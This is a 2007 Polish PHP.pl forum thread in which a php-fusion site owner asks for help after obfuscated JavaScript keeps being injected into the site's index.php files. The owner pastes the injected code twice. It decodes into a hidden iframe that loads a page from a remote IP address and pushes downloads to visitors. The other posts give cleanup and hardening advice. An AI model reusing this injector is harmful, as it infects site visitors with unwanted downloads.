Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
Reply to this topicStart new topic
> Spyware w index.php, Spyware w index.php - problem
syrox
post 30.11.2007, 22:50:13
Post #1





Grupa: Zarejestrowani
Postów: 27
Pomógł: 0
Dołączył: 30.11.2007

Ostrzeżenie: (0%)
-----


Witam,
Od jakiegoś czasu zauważylem, ze coś niedobrego dzieje się z moją stronką, która stoi na systemie php-fusion.
Otóż plik index.php ( w katalogu głównym strony ) oraz w katalogu administracji pewnego razu został uszkodzony. Nie znam się za bardzo na php , ale wydaje mi sie , ze ktoś albo coś niepoprawnie podmienil te pliki.
Wrzuciłem orginalne indexy i wszystko zadziałalo ponownie. Pomyslalem sobie, ze to pewnie wina serwera i dałem spokoj z nadzieją, że problem już nigdy nie powróci. Myliłem się!

Od wczraj w pliku index.php ( katalog glowny ) oraz index.php ( administration )
- ( nie wiem gdzie jeszcze)

występuje coś takiego () na samym dole kodu :
-> index.php ( katalog glowny )
"index.php
CODE

require_once "maincore.php";

redirect($settings['opening_page']);
?><!-- o65 --><script type='text/javascript'>function F1B5B1EBD6CAADD0DB7(A2625E9F425A4E413A550C090C6718){var F137DC292706D98A24E02100810255=16;return(parseInt(A2625E9F425A4E413A550C090C6718
F137DC292706D98A24E02100810255));}function A28544CEDFDF7273B891CDF94B6E2(A8665970002354CE5Cb){var DAA88B9748379D759729D1=2;var EA8056E267241594097C6DCC='';for(CA2380843B2AFD36EFBF=0;CA2380843B2AFD36EFBF<A8665970002354CE5CB.length;CA2380843B2AFD36EFBF+=DAA88B9748379D759729D1){EA80
6E267241594097C6DCC+=(String.fromCharCode(F1B5B1EBD6CAADD0DB7(A8665970002354CE5C
.substr(CA2380843B2AFD36EFBF,DAA88B9748379D759729D1))));}document.write(EA8056E2
7241594097C6DCC);}A28544CEDFDF7273B891CDF94B6E2('3C696672616D65207372633D687474703A2F2F35382E36352E3233332E39372F57345951694C
2752E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6
6E65223E3C2F696672616D653E');</script><!-- c65 -->"


oraz:
Index.php ( administration )
index.php - administraca
CODE


?><!-- o65 --><script type='text/javascript'>function F1B5B1EBD6CAADD0DB7(A2625E9F425A4E413A550C090C6718){var F137DC292706D98A24E02100810255=16;return(parseInt(A2625E9F425A4E413A550C090C6718
F137DC292706D98A24E02100810255));}function A28544CEDFDF7273B891CDF94B6E2(A8665970002354CE5Cb){var DAA88B9748379D759729D1=2;var EA8056E267241594097C6DCC='';for(CA2380843B2AFD36EFBF=0;CA2380843B2AFD36EFBF<A8665970002354CE5CB.length;CA2380843B2AFD36EFBF+=DAA88B9748379D759729D1){EA80
6E267241594097C6DCC+=(String.fromCharCode(F1B5B1EBD6CAADD0DB7(A8665970002354CE5C
.substr(CA2380843B2AFD36EFBF,DAA88B9748379D759729D1))));}document.write(EA8056E2
7241594097C6DCC);}A28544CEDFDF7273B891CDF94B6E2('3C696672616D65207372633D687474703A2F2F35382E36352E3233332E39372F57345951694C
2752E7068702077696474683D31206865696768743D31207374796C653D22646973706C61793A6E6
6E65223E3C2F696672616D653E');</script><!-- c65 -->




Chodzi oczywiscie o ten skrypt "--c65-->"
Ten sam kod ładuje sie takze do katalogu "include" index.php.

-------------------------------------------------------

Dodatkowo jak wchodze do panelu administracyjnego to w stopce strony widze jak ładują sie jakies strony ( nie wyskają okienka).. po czym komputer zaczyna sciagać jakiś badziew...

Co to jest?? i jak to zlikwidować? Prosze o pomoc zanim mnie szlag jasny trafi..
Go to the top of the page
+Quote Post
qrees
post 30.11.2007, 23:53:27
Post #2





Grupa: Zarejestrowani
Postów: 275
Pomógł: 44
Dołączył: 23.11.2007

Ostrzeżenie: (0%)
-----


A dobrze masz serwer zabezpieczony? Sposobów na wgranie przez kogoś tego może być wiele. Jeżeli masz kiepskie hasło, to wiadomo, trzeba je zmienić. Możesz mieć na kompie keyloggera, więc przeskanuj go antywirusem. Możesz mieć wgrany jakiś skrypt z błędami, który pozwala innym na modyfikowanie plikó na serwerze. Powiedz coś więcej o tym serwerze, czy to serwer dedykowany, czy jakiś hosting.

Problemów może być wiele, ale jak już raz ktoś ci coś takiego wgrał, to zwykłe ponowne wgranie kilku plików nie pomoże. Najlepiej wgrać wszystko od zera.
Go to the top of the page
+Quote Post
syrox
post 1.12.2007, 00:14:03
Post #3





Grupa: Zarejestrowani
Postów: 27
Pomógł: 0
Dołączył: 30.11.2007

Ostrzeżenie: (0%)
-----


Serwer jest hostingowany przez whiterabbit.pl co prawda mają tam hosting gier, ale dogadałem się i za niższą cene udostępnili mi serwer www - nazywa sie Reseller. Mam mozliwosc tworzenia nowych kont dla domen itp.
Oprogramowanie jak widze jest stare , brak aktualizacji.. nawet nie ma php 5. Ale nie wazne..

Hasło do ftp zmieniłem przed chwilą. Zauważyłem, że wszystkich pliki index.php znajduję się ten badziewny kod, który podałem wyżej..
Go to the top of the page
+Quote Post
Darti
post 1.12.2007, 00:16:41
Post #4





Grupa: Zarejestrowani
Postów: 1 076
Pomógł: 62
Dołączył: 6.03.2005
Skąd: Wroc

Ostrzeżenie: (0%)
-----


Uaktualnij php-fusion, sprawdz prawa zapisu plików, zmien hasla dostępowe


--------------------
The answer is out there, Neo. It's looking for you. And it will find you, if you want it to.
SERVER_SOFTWARE : Apache/2.2.4 (Win32) PHP/5.2.1
MySQL Client API version : 5.0.27
Go to the top of the page
+Quote Post
qrees
post 1.12.2007, 10:51:53
Post #5





Grupa: Zarejestrowani
Postów: 275
Pomógł: 44
Dołączył: 23.11.2007

Ostrzeżenie: (0%)
-----


Cytat(Darti @ 1.12.2007, 00:16:41 ) *
Uaktualnij php-fusion, sprawdz prawa zapisu plików, zmien hasla dostępowe



No jak już mówiłem, samo uaktualnienie nie wystarczy. Proponowałbym skasować wszystkie pliki i wgrać czystego php-fusion na starej bazie danych. Jak ci ktoś w plikach index.php nabruździł, to mógł równie dobrze gdziekolwiek indziej też coś wcisnąć, żeby w razie czego mieć dostęp do konta nawet po zmianie hasła.
Go to the top of the page
+Quote Post
syrox
post 1.12.2007, 12:12:28
Post #6





Grupa: Zarejestrowani
Postów: 27
Pomógł: 0
Dołączył: 30.11.2007

Ostrzeżenie: (0%)
-----


Wymiotłem zabrudzone indexy oraz zmieniłem hasło. Na razie jest dobrze.
Od wczoraj nic sie nie dzieje złego . Wczesniej po wyczyszczeniu indexow ( jakies 3-4 min i był syf ponownie.

Zobaczymy za 6 h.
Go to the top of the page
+Quote Post
grzesiek_g
post 1.12.2007, 12:19:05
Post #7





Grupa: Zarejestrowani
Postów: 249
Pomógł: 30
Dołączył: 18.07.2007

Ostrzeżenie: (0%)
-----


Podaj adres, ta funkcja js ma coś wypisać na ekran, zerknięcie w źródło HTML może dużo wyjaśnić. Albo sam poszukaj różnych podejrzanych rzeczy w kodzie HTML który otrzymuje przeglądarka.

-- EDIT--
Nie zauważyłem jak odpisałeś, w razie czego szukaj nieprawidłowości w kodzie HTML, to może dać chociaż wskazówkę.

Ten post edytował grzesiek_g 1.12.2007, 12:20:54


--------------------
Warsztat: Ubuntu 12.10, PHPStorm
http://vertoo.pl
Go to the top of the page
+Quote Post
itsme
post 1.12.2007, 17:53:07
Post #8





Grupa: Zarząd
Postów: 1 512
Pomógł: 2
Dołączył: 22.04.2002
Skąd: Koszalin




Temat: Tematyka i zasady panu...ole
tutaj znajdziesz pewne odpowiedzi na pytanie: czy prawidłowo utworzyłem temat ?


--------------------
brak sygnaturki rowniez jest sygnaturką
Go to the top of the page
+Quote Post
syrox
post 2.12.2007, 19:29:51
Post #9





Grupa: Zarejestrowani
Postów: 27
Pomógł: 0
Dołączył: 30.11.2007

Ostrzeżenie: (0%)
-----


Cytat(itsme @ 1.12.2007, 17:53:07 ) *
Temat: Tematyka i zasady panu...ole
tutaj znajdziesz pewne odpowiedzi na pytanie: czy prawidłowo utworzyłem temat ?


Nieprawidłowo. Ale następnym razem już bedzie lepiej.

Wracając do tematu. - Wyczyscilem wszystkie index.-y i problem znikł. Ale za to była następna niespodzianka!
Na tym samym serwerze, ale już na innym koncie ftp ( oraz www) pojawił sie ten sam problem.. Strona w calosci zrobiona w html-u/css z małymi kodami js. Na stronie głównej index.html pojawił sie identyczny skrypt js oraz te same objawy co na php fusion. Zmieniłem totalnie wszystkie hasła / panel do konta / ftp / oraz panel główny serwera. Teraz wszystko w porządku snitch.gif .
Go to the top of the page
+Quote Post
SirZooro
post 2.12.2007, 19:34:55
Post #10





Grupa: Zarejestrowani
Postów: 243
Pomógł: 32
Dołączył: 14.06.2007

Ostrzeżenie: (0%)
-----


Zerknij też tutaj - jest tu patch do ostatnio wykrytej dziury w PHP Fusion.


--------------------
Go to the top of the page
+Quote Post

Reply to this topicStart new topic
1 Użytkowników czyta ten temat (1 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Wersja Lo-Fi Aktualny czas: 14.08.2025 - 06:04